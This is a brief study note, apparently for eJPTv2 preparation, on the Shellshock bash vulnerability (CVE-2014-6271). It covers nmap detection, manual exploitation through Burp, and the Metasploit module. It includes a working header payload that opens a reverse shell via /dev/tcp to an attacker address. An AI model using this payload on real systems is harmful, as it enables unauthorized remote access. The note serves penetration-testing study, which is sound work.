Tags:template Related to:note-taking,notes See also: Index: 📁EJPTv2 - INDEX
CVE 2014 6271 - Shellshock
Casued by vuln in bash after a series of spl characters
Can also afffect apache web servers configured to run CGI or sh scripts are also vuln
Input vector should be able to communicate with bash
Can be manually exploited or automatically with use of metasploit
Can be found using
nmap -sV ip —script=http-shellshock —script-args “http-shellshock.uri=cgi/script/url”
Can be manually exploited using burp. Intercept traffic and modify headers () { : ; } ; echo ; echo; /bin/bash -c ‘bash -i >&/dev/tcp/attacker-sys-ip/portnumber 0>&1’
Can be exploited in metasploit using apache_mod_cgi_bash_env_exec module